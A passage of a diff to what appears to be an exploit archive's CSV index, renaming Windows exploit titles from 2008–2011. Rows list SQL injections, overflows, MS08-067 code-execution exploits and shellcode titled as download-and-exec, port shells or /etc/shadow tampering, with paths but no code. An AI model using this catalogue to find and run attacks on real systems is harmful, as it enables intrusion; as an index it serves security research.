Vulnerability",2008-09-27,Stack,php,webapps,0 @@ -6185,7 +6185,7 @@ id,file,description,date,author,platform,type,port 6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining (news_read.php id) SQL Injection Vulnerability",2008-09-28,S.W.A.T.,php,webapps,0 6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0 6615,platforms/windows/dos/6615.html,"Opera 9.52 Window Object Suppressing Remote Denial of Service Exploit",2008-09-28,"Aditya K Sood",windows,dos,0 -6616,platforms/windows/dos/6616.txt,"MS Windows Explorer Unspecified .ZIP File Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0 +6616,platforms/windows/dos/6616.txt,"Microsoft Windows - Explorer Unspecified .ZIP File Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0 6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 (lien_2) Local Directory Traversal Vulnerability",2008-09-28,JIKO,php,webapps,0 6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser <= 0.1.5 rc2 - Directory Traversal vuln",2008-09-28,Cr@zy_King,php,webapps,0 6619,platforms/windows/dos/6619.html,"MS Internet Explorer GDI+ - Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0 @@ -6224,7 +6224,7 @@ id,file,description,date,author,platform,type,port 6653,platforms/php/webapps/6653.txt,"OLIB 7 WebView 2.5.1.1 (infile) Local File Inclusion Vulnerability",2008-10-02,ZeN,php,webapps,0 6654,platforms/windows/dos/6654.pl,"mIRC 6.34 Remote Buffer Overflow PoC",2008-10-02,securfrog,windows,dos,0 6655,platforms/php/webapps/6655.php,"OpenX 2.6 (ac.php bannerid) Remote Blind SQL Injection Exploit",2008-10-02,d00m3r4ng,php,webapps,0 -6656,platforms/windows/remote/6656.txt,"MS Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0 +6656,platforms/windows/remote/6656.txt,"Microsoft Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0 6657,platforms/php/webapps/6657.pl,"IP Reg <= 0.4 - Remote Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 6658,platforms/windows/dos/6658.txt,"VBA32 Personal Antivirus 3.12.8.x (malformed archive) DoS Exploit",2008-10-03,LiquidWorm,windows,dos,0 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script (arsaprint.php id) SQL Injection Vulnerability",2008-10-03,"Hussin X",php,webapps,0 @@ -6238,7 +6238,7 @@ id,file,description,date,author,platform,type,port 6668,platforms/windows/dos/6668.txt,"AyeView 2.20 (malformed gif image) Local Crash Exploit",2008-10-04,suN8Hclf,windows,dos,0 6669,platforms/php/webapps/6669.txt,"JMweb Multiple (src) Local File Inclusion Vulnerabilities",2008-10-04,SirGod,php,webapps,0 6670,platforms/php/webapps/6670.txt,"FOSS Gallery Admin <= 1.0 - Remote Arbitrary Upload Exploit",2008-10-04,Pepelux,php,webapps,0 -6671,platforms/windows/dos/6671.c,"MS Windows Vista Access Violation from Limited Account Exploit (BSoD)",2008-10-04,Defsanguje,windows,dos,0 +6671,platforms/windows/dos/6671.c,"Microsoft Windows Vista Access Violation from Limited Account Exploit (BSoD)",2008-10-04,Defsanguje,windows,dos,0 6672,platforms/windows/dos/6672.txt,"AyeView 2.20 (invalid bitmap header parsing) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 6673,platforms/windows/dos/6673.txt,"FastStone Image Viewer 3.6 (malformed bmp image) Crash Exploit",2008-10-05,suN8Hclf,windows,dos,0 6674,platforms/php/webapps/6674.pl,"FOSS Gallery Public <= 1.0 Arbitrary Upload / Information c99 Expoit",2008-10-05,JosS,php,webapps,0 @@ -6271,7 +6271,7 @@ id,file,description,date,author,platform,type,port 6702,platforms/php/webapps/6702.txt,"AdMan 1.1.20070907 (campaignId) SQL Injection Vulnerability",2008-10-08,SuB-ZeRo,php,webapps,0 6703,platforms/php/webapps/6703.txt,"WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Remote Vulnerabilities",2008-10-08,GoLd_M,php,webapps,0 6704,platforms/linux/dos/6704.txt,"Konqueror 3.5.9 (color/bgcolor) Multiple Remote Crash Vulnerabilities",2008-10-08,"Jeremy Brown",linux,dos,0 -6705,platforms/windows/local/6705.txt,"MS Windows 2003 Token Kidnapping Local Exploit PoC",2008-10-08,"Cesar Cerrudo",windows,local,0 +6705,platforms/windows/local/6705.txt,"Microsoft Windows 2003 - Token Kidnapping Local Exploit PoC",2008-10-08,"Cesar Cerrudo",windows,local,0 6706,platforms/php/webapps/6706.php,"Kusaba <= 1.0.4 - Remote Code Execution Exploit",2008-10-09,Sausage,php,webapps,0 6707,platforms/php/webapps/6707.txt,"Gforge <= 4.5.19 Multiple Remote SQL Injection Vulnerabilities",2008-10-09,beford,php,webapps,0 6708,platforms/php/webapps/6708.txt,"Gforge <= 4.6 rc1 (skill_edit) SQL Injection Vulnerability",2008-10-09,beford,php,webapps,0 @@ -6282,7 +6282,7 @@ id,file,description,date,author,platform,type,port 6713,platforms/php/webapps/6713.txt,"ScriptsEz Mini Hosting Panel (members.php) LFI Vulnerability",2008-10-09,JosS,php,webapps,0 6714,platforms/php/webapps/6714.pl,"Stash 1.0.3 (SQL) User Credentials Disclosure Exploit",2008-10-09,gnix,php,webapps,0 6715,platforms/php/webapps/6715.txt,"ScriptsEz Easy Image Downloader Local File Download Vulnerability",2008-10-09,JosS,php,webapps,0 -6716,platforms/windows/dos/6716.pl,"MS Windows GDI+ - Proof of Concept (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 +6716,platforms/windows/dos/6716.pl,"Microsoft Windows GDI+ - Proof of Concept (MS08-052) (2)",2008-10-09,"John Smith",windows,dos,0 6717,platforms/windows/dos/6717.py,"WinFTP 2.3.0 (PASV mode) Remote Denial of Service Exploit",2008-10-09,dmnt,windows,dos,0 6718,platforms/linux/dos/6718.html,"Konqueror 3.5.9 (load) Remote Crash Vulnerability",2008-10-10,"Jeremy Brown",linux,dos,0 6719,platforms/windows/dos/6719.py,"NoticeWare E-mail Server 5.1.2.2 (POP3) Pre-Auth DoS Exploit",2008-10-10,rAWjAW,windows,dos,0 @@ -6297,7 +6297,7 @@ id,file,description,date,author,platform,type,port 6729,platforms/php/webapps/6729.php,"SlimCMS <= 1.0.0 (redirect.php) Privilege Escalation Exploit",2008-10-10,StAkeR,php,webapps,0 6730,platforms/php/webapps/6730.txt,"Joomla Component ownbiblio 1.5.3 (catid) SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0 6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 (xlacomments.asp) SQL Injection Vuln",2008-10-11,Hakxer,asp,webapps,0 -6732,platforms/windows/dos/6732.txt,"MS Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0 +6732,platforms/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow PoC (MS08-046)",2008-10-12,Ac!dDrop,windows,dos,0 6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 (lfd/ce) Multiple Vulnerabilities",2008-10-12,muuratsalo,php,webapps,0 6734,platforms/php/webapps/6734.txt,"mini-pub 0.3 - Local Directory Traversal / File Disclosure Vulnerabilities",2008-10-12,GoLd_M,php,webapps,0 6735,platforms/php/webapps/6735.php,"Globsy <= 1.0 - Remote File Rewriting Exploit",2008-10-12,StAkeR,php,webapps,0 @@ -6322,7 +6322,7 @@ id,file,description,date,author,platform,type,port 6754,platforms/php/webapps/6754.txt,"My PHP Dating (success_story.php id) SQL Injection Vulnerability",2008-10-14,Hakxer,php,webapps,0 6755,platforms/php/webapps/6755.php,"PhpWebGallery <= 1.7.2 Session Hijacking / Code Execution Exploit",2008-10-14,EgiX,php,webapps,0 6756,platforms/windows/dos/6756.txt,"VLC 0.9.2 Media Player XSPF Memory Corruption Vulnerability",2008-10-14,"Core Security",windows,dos,0 -6757,platforms/windows/local/6757.txt,"MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin)",2008-10-15,"Ruben Santamarta ",windows,local,0 +6757,platforms/windows/local/6757.txt,"Microsoft Windows 2003/XP - AFD.sys Privilege Escalation Exploit (K-plugin)",2008-10-15,"Ruben Santamarta ",windows,local,0 6758,platforms/php/webapps/6758.txt,"AstroSPACES (id) Remote SQL Injection Vulnerability",2008-10-15,TurkishWarriorr,php,webapps,0 6759,platforms/php/webapps/6759.txt,"mystats (hits.php) Multiple Vulnerabilities exploit",2008-10-15,JosS,php,webapps,0 6760,platforms/php/webapps/6760.txt,"myEvent 1.6 (viewevent.php) Remote SQL Injection Vulnerability",2008-10-15,JosS,php,webapps,0 @@ -6387,7 +6387,7 @@ id,file,description,date,author,platform,type,port 6821,platforms/php/webapps/6821.txt,"miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities",2008-10-23,StAkeR,php,webapps,0 6822,platforms/php/webapps/6822.txt,"websvn <= 2.0 (xss/fh/ce) Multiple Vulnerabilities",2008-10-23,"GulfTech Security",php,webapps,0 6823,platforms/php/webapps/6823.txt,"siteengine 5.x Multiple Vulnerabilities",2008-10-23,xy7,php,webapps,0 -6824,platforms/windows/dos/6824.txt,"MS Windows Server Service - Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0 +6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution PoC (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0 6825,platforms/windows/local/6825.pl,"VLC 0.9.4 .TY File Buffer Overflow Exploit (SEH)",2008-10-23,"Guido Landi",windows,local,0 6826,platforms/php/webapps/6826.txt,"joomla component archaic binary gallery 0.2 - Directory Traversal vuln",2008-10-24,H!tm@N,php,webapps,0 6827,platforms/php/webapps/6827.txt,"Joomla Component Kbase 1.0 - Remote SQL Injection Vulnerability",2008-10-24,H!tm@N,php,webapps,0 @@ -6404,7 +6404,7 @@ id,file,description,date,author,platform,type,port 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (meta)",2008-10-25,"Saint Patrick",windows,dos,0 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln",2008-10-26,"Hussin X",php,webapps,0 6840,platforms/windows/remote/6840.html,"PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 -6841,platforms/windows/remote/6841.txt,"MS Windows Server Service - Code Execution Exploit (MS08-067) (Univ)",2008-10-26,EMM,windows,remote,135 +6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution Exploit (MS08-067) (Univ)",2008-10-26,EMM,windows,remote,135 6842,platforms/php/webapps/6842.txt,"WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln",2008-10-26,boom3rang,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum (forum.php id) SQL Injection Vulnerability",2008-10-26,Hurley,php,webapps,0 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 (lecture.php id) Remote SQL Injection Exploit",2008-10-26,Vrs-hCk,php,webapps,0 @@ -6661,7 +6661,7 @@ id,file,description,date,author,platform,type,port 7101,platforms/php/webapps/7101.txt,"AlstraSoft SendIt Pro Remote File Upload Vulnerability",2008-11-12,ZoRLu,php,webapps,0 7102,platforms/php/webapps/7102.txt,"AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln",2008-11-12,ZoRLu,php,webapps,0 7103,platforms/php/webapps/7103.txt,"AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln",2008-11-12,ZoRLu,php,webapps,0 -7104,platforms/windows/remote/7104.c,"MS Windows Server Service - Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135 +7104,platforms/windows/remote/7104.c,"Microsoft Windows Server - Code Execution Exploit (MS08-067)",2008-11-12,Polymorphours,windows,remote,135 7105,platforms/php/webapps/7105.txt,"Quick Poll Script (code.php id) Remote SQL Injection Vulnerability",2008-11-12,"Hussin X",php,webapps,0 7106,platforms/php/webapps/7106.txt,"turnkeyforms Local Classifieds Auth Bypass Vulnerability",2008-11-12,G4N0K,php,webapps,0 7107,platforms/php/webapps/7107.txt,"turnkeyforms Web Hosting Directory Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps,0 @@ -6686,7 +6686,7 @@ id,file,description,date,author,platform,type,port 7129,platforms/multiple/local/7129.sh,"Sudo <= 1.6.9p18 - (Defaults setenv) Local Privilege Escalation Exploit",2008-11-15,kingcope,multiple,local,0 7130,platforms/php/webapps/7130.php,"Minigal b13 (index.php list) Remote File Disclosure Exploit",2008-11-15,"Alfons Luja",php,webapps,0 7131,platforms/php/webapps/7131.txt,"yahoo answers (id) Remote SQL Injection Vulnerability",2008-11-16,snakespc,php,webapps,0 -7132,platforms/windows/remote/7132.py,"MS Windows Server Service - Code Execution Exploit (MS08-067) (2k/2k3)",2008-11-16,"Debasis Mohanty",windows,remote,445 +7132,platforms/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution Exploit (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 7133,platforms/php/webapps/7133.txt,"FloSites Blog Multiple Remote SQL Injection Vulnerabilities",2008-11-16,Vrs-hCk,php,webapps,0 7134,platforms/php/webapps/7134.txt,"phpstore Wholesale (track.php?id) SQL Injection Vulnerability",2008-11-16,"Hussin X",php,webapps,0 7135,platforms/windows/local/7135.htm,"Opera 9.62 file:// Local Heap Overflow Exploit",2008-11-17,"Guido Landi",windows,local,0 @@ -7125,7 +7125,7 @@ id,file,description,date,author,platform,type,port 7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 (MAP File) Local SEH Overwrite Exploit",2008-12-28,Cnaph,windows,local,0 7583,platforms/windows/remote/7583.pl,"MS Internet Explorer XML Parsing Buffer Overflow Exploit",2008-12-28,"Jeremy Brown",windows,remote,0 7584,platforms/windows/remote/7584.pl,"Amaya Web Browser <= 11.0.1 - Remote Buffer Overflow Exploit (vista)",2008-12-28,SkD,windows,remote,0 -7585,platforms/windows/dos/7585.txt,"MS Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0 +7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0 7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability",2008-12-28,bizzit,php,webapps,0 7587,platforms/php/webapps/7587.txt,"Joomla Component PAX Gallery 0.1 - Blind SQL Injection Vulnerability",2008-12-28,XaDoS,php,webapps,0 7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client (.bps File) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0 @@ -7257,7 +7257,7 @@ id,file,description,date,author,platform,type,port 7717,platforms/php/webapps/7717.pl,"Joomla com_jashowcase (catid) Remote SQL Injection Exploit",2009-01-11,EcHoLL,php,webapps,0 7718,platforms/php/webapps/7718.txt,"Joomla com_newsflash (id) Remote SQL Injection Vulnerability",2009-01-11,EcHoLL,php,webapps,0 7719,platforms/php/webapps/7719.txt,"Fast Guest Book (Auth Bypass) SQL Injection Vulnerability",2009-01-11,Moudi,php,webapps,0 -7720,platforms/windows/dos/7720.pl,"MS Windows (.CHM File) Denial of Service (html compiled)",2009-01-11,securfrog,windows,dos,0 +7720,platforms/windows/dos/7720.pl,"Microsoft Windows - (.CHM File) Denial of Service (html compiled)",2009-01-11,securfrog,windows,dos,0 7721,platforms/windows/dos/7721.pl,"Browse3D 3.5 (.sfs File) Local Buffer Overflow PoC",2009-01-11,Houssamix,windows,dos,0 7722,platforms/php/webapps/7722.txt,"DZcms 3.1 (products.php pcat) Remote SQL Injection Vulnerability",2009-01-11,"Glafkos Charalambous ",php,webapps,0 7723,platforms/php/webapps/7723.txt,"Seo4SMF for SMF forums Multiple Vulnerabilities",2009-01-11,WHK,php,webapps,0 @@ -7950,7 +7950,7 @@ id,file,description,date,author,platform,type,port 8442,platforms/php/webapps/8442.txt,"Job2C (conf.inc) Config File Disclosure Vulnerability",2009-04-15,InjEctOr5,php,webapps,0 8443,platforms/php/webapps/8443.txt,"Job2C 4.2 (adtype) Local File Inclusion Vulnerability",2009-04-15,ZoRLu,php,webapps,0 8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0 -8445,platforms/windows/dos/8445.pl,"MS Windows Media Player (.mid File) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0 +8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - (.mid File) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0 8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability",2009-04-15,ahmadbady,php,webapps,0 8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0 8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0 @@ -8772,7 +8772,7 @@ id,file,description,date,author,platform,type,port 9298,platforms/windows/local/9298.pl,"Millenium MP3 Studio 1.0 .mpf File Local Stack Overflow Exploit (update)",2009-07-30,corelanc0d3r,windows,local,0 9299,platforms/windows/local/9299.pl,"WINMOD 1.4 - (.lst) Local Stack Overflow Exploit XP SP3 (RET+SEH) (3)",2009-07-28,corelanc0d3r,windows,local,0 9300,platforms/multiple/dos/9300.c,"ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC",2009-07-30,kingcope,multiple,dos,0 -9301,platforms/windows/local/9301.txt,"Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit",2009-07-30,"NT Internals",windows,local,0 +9301,platforms/windows/local/9301.txt,"Microsoft Windows XP - (win32k.sys) Local Privilege Escalation Exploit",2009-07-30,"NT Internals",windows,local,0 9302,platforms/linux/local/9302.py,"Compface 1.1.5 (.xbm File) Local Buffer Overflow Exploit",2009-07-30,His0k4,linux,local,0 9303,platforms/windows/remote/9303.c,"VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit",2009-07-30,"Pankaj Kohli",windows,remote,0 9304,platforms/windows/dos/9304.txt,"Epiri Professional Web Browser 3.0 - Remote Crash Exploit",2009-07-30,LiquidWorm,windows,dos,0 @@ -8881,7 +8881,7 @@ id,file,description,date,author,platform,type,port 9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln",2009-08-11,kkr,php,webapps,0 9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 (systemid) SQL Injection Vulnerability",2009-08-11,"Guilherme Marinheiro",php,webapps,0 -9417,platforms/windows/dos/9417.txt,"MS Windows 2003 (EOT File) BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0 +9417,platforms/windows/dos/9417.txt,"Microsoft Windows 2003 - (EOT File) BSOD Crash Exploit",2009-08-11,webDEViL,windows,dos,0 9418,platforms/windows/local/9418.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (2)",2009-08-11,"ThE g0bL!N",windows,local,0 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b (Auth Bypass) Insecure Cookie Handling Vulnerability",2009-08-12,"Pedro Laguna",php,webapps,0 9420,platforms/windows/local/9420.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH) (3)",2009-08-12,hack4love,windows,local,0 @@ -11970,7 +11970,7 @@ id,file,description,date,author,platform,type,port 13529,platforms/win32/shellcode/13529.c,"win xp/2000/2003 Download File and Exec 241 bytes",2004-10-25,lion,win32,shellcode,0 13530,platforms/win32/shellcode/13530.asm,"windows/XP download and exec source",2004-09-26,"Peter Winter-Smith",win32,shellcode,0 13531,platforms/win32/shellcode/13531.c,"windows/XP-sp1 portshell on port 58821 116 bytes",2004-09-26,silicon,win32,shellcode,0 -13532,platforms/win32/shellcode/13532.asm,"MS Windows (DCOM RPC2) Universal Shellcode",2003-10-09,N/A,win32,shellcode,0 +13532,platforms/win32/shellcode/13532.asm,"Microsoft Windows - (DCOM RPC2) Universal Shellcode",2003-10-09,N/A,win32,shellcode,0 13533,platforms/win64/shellcode/13533.asm,"win64 (URLDownloadToFileA) download and execute 218+ bytes",2006-08-07,Weiss,win64,shellcode,0 13548,platforms/lin_x86/shellcode/13548.asm,"linux/x86 kill all processes 9 bytes",2010-01-14,root@thegibson,lin_x86,shellcode,0 13549,platforms/lin_x86/shellcode/13549.c,"Linux - setuid(0) & execve(""/sbin/poweroff -f"")",2009-12-04,ka0x,lin_x86,shellcode,0 @@ -12041,14 +12041,14 @@ id,file,description,date,author,platform,type,port 13712,platforms/linux/shellcode/13712.c,"Linux/x86 - Disable randomize stack addresse - 106 bytes",2010-05-25,"Jonathan Salwan",linux,shellcode,0 13715,platforms/linux/shellcode/13715.c,"Linux/x86 pwrite(""/etc/shadow"", hash, 32, 8) Shellcode 83",2010-05-27,agix,linux,shellcode,0 13716,platforms/linux/shellcode/13716.c,"Linux/x86 alphanumeric Bomb FORK Shellcode 117 Bytes",2010-05-27,agix,linux,shellcode,0 -13719,platforms/win64/shellcode/13719.txt,"Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes",2010-05-28,agix,win64,shellcode,0 +13719,platforms/win64/shellcode/13719.txt,"Windows 7 Pro SP1 64 Fr (Beep) Shellcode 39 Bytes",2010-05-28,agix,win64,shellcode,0 13722,platforms/linux/shellcode/13722.c,"linux/x86 Shellcode Polymorphic - setuid(0) + chmod(""/etc/shadow"", 0666) Shellcode 61 Bytes",2010-05-31,antrhacks,linux,shellcode,0 13723,platforms/linux/shellcode/13723.c,"change mode 0777 of ""/etc/shadow"" with sys_chmod syscall",2010-05-31,gunslinger_,linux,shellcode,0 13724,platforms/linux/shellcode/13724.c,"kill all running process x86/linux",2010-05-31,gunslinger_,linux,shellcode,0 13725,platforms/linux/shellcode/13725.txt,"change mode 0777 of ""/etc/passwd"" with sys_chmod syscall",2010-05-31,gunslinger_,linux,shellcode,0 13726,platforms/linux/shellcode/13726.txt,"45 bytes sys_execve(""/bin/sh"", ""-c"", ""reboot"") x86 linux shellcode",2010-05-31,gunslinger_,linux,shellcode,0 13728,platforms/linux/shellcode/13728.c,"39 bytes sys_setuid(0) & sys_setgid(0) & execve (""/bin/sh"") x86 linux shellcode",2010-06-01,gunslinger_,linux,shellcode,0 -13729,platforms/win64/shellcode/13729.txt,"Windows Seven x64 (cmd) Shellcode 61 Bytes",2010-06-01,agix,win64,shellcode,0 +13729,platforms/win64/shellcode/13729.txt,"Windows 7 x64 (cmd) Shellcode 61 Bytes",2010-06-01,agix,win64,shellcode,0 13730,platforms/linux/shellcode/13730.c,"33 bytes unlink ""/etc/shadow"" x86 linux shellcode",2010-06-02,gunslinger_,linux,shellcode,0 13731,platforms/linux/shellcode/13731.c,"x86 linux hard / unclean reboot (29 bytes)",2010-06-03,gunslinger_,linux,shellcode,0 13732,platforms/linux/shellcode/13732.c,"x86 linux hard / unclean reboot (33 bytes)",2010-06-03,gunslinger_,linux,shellcode,0 @@ -12735,7 +12735,7 @@ id,file,description,date,author,platform,type,port 14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - CSRF Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - XSS Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross Site Request Forgery Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -14566,platforms/windows/local/14566.c,"Microsoft Windows win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow",2010-08-06,Arkon,windows,local,0 +14566,platforms/windows/local/14566.c,"Microsoft Windows - win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow",2010-08-06,Arkon,windows,local,0 14569,platforms/php/webapps/14569.txt,"joomla component cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0 14570,platforms/php/webapps/14570.txt,"Joomla Component com_neorecruit 1.4 - SQL Injection Vulnerability",2010-08-07,v3n0m,php,webapps,0 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection Vulnerability",2010-08-07,Silic0n,php,webapps,0 @@ -12769,7 +12769,7 @@ id,file,description,date,author,platform,type,port 14608,platforms/windows/dos/14608.txt,"Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048)",2010-08-10,"Core Security",windows,dos,0 14609,platforms/windows/dos/14609.py,"Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)",2010-08-10,Skylined,windows,dos,0 14610,platforms/windows/local/14610.txt,"Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability",2010-08-10,"Cesar Cerrudo",windows,local,0 -14611,platforms/windows/dos/14611.c,"Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048)",2010-08-10,MJ0011,windows,dos,0 +14611,platforms/windows/dos/14611.c,"Microsoft Windows - 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048)",2010-08-10,MJ0011,windows,dos,0 14612,platforms/windows/local/14612.py,"Mediacoder 0.7.5.4710 Buffer Overflow Exploit",2010-08-11,anonymous,windows,local,0 14613,platforms/windows/dos/14613.py,"Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0 14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Include Vulnerability",2010-08-11,Offensive,php,webapps,0 @@ -12839,7 +12839,7 @@ id,file,description,date,author,platform,type,port 14702,platforms/php/webapps/14702.txt,"Joomla Component com_zina SQL Injection Vulnerability",2010-08-21,"Th3 RDX",php,webapps,0 14703,platforms/php/webapps/14703.txt,"Joomla Component Biblioteca 1.0 Beta Multiple SQL Injection Vulnerabilities",2010-08-21,"Salvatore Fresta",php,webapps,0 14704,platforms/asp/webapps/14704.txt,"T-dreams Announcement Script SQL Injection Vulnerability",2010-08-21,"Br0wn Sug4r",asp,webapps,0 -14705,platforms/windows/dos/14705.c,"Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0 +14705,platforms/windows/dos/14705.c,"Microsoft Windows - (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability",2010-08-21,l3D,windows,dos,0 14706,platforms/windows/local/14706.py,"MS Excel Malformed FEATHEADER Record Exploit (MS09-067)",2010-08-21,anonymous,windows,local,0 14707,platforms/php/webapps/14707.txt,"Joomla Component (com_Fabrik) SQL Injection Vulnerability",2010-08-21,Mkr0x,php,webapps,0 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0 @@ -12860,7 +12860,7 @@ id,file,description,date,author,platform,type,port 14730,platforms/windows/local/14730.c,"Firefox <= 3.6.8 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx)",2010-08-24,TheLeader,windows,local,0 14732,platforms/windows/local/14732.c,"Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0 -14733,platforms/windows/local/14733.c,"Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll)",2010-08-24,TheLeader,windows,local,0 +14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - wab.exe DLL Hijacking Exploit (wab32res.dll)",2010-08-24,TheLeader,windows,local,0 14734,platforms/windows/local/14734.c,"TeamViewer <= 5.0.8703 DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 DLL Hijacking Exploit (ibfs32.dll)",2010-08-24,"Glafkos Charalambous ",windows,local,0 14737,platforms/php/webapps/14737.txt,"Simple Forum PHP Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0 @@ -13952,7 +13952,7 @@ id,file,description,date,author,platform,type,port 16160,platforms/php/webapps/16160.txt,"Pixelpost 1.7.3 - Multiple POST Variables SQL Injection Vulnerability",2011-02-12,LiquidWorm,php,webapps,0 16162,platforms/windows/local/16162.pl,"CuteZip 2.1 - Buffer Overflow Exploit",2011-02-12,"C4SS!0 G0M3S",windows,local,0 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross Site Script Vulnerability",2011-02-14,_84kur10_,php,webapps,0 -16166,platforms/windows/dos/16166.py,"MS Windows Server 2003 AD Pre-Auth BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 +16166,platforms/windows/dos/16166.py,"Microsoft Windows 2003 - AD Pre-Auth BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 16167,platforms/php/webapps/16167.txt,"jSchool Advanced SQL Injection 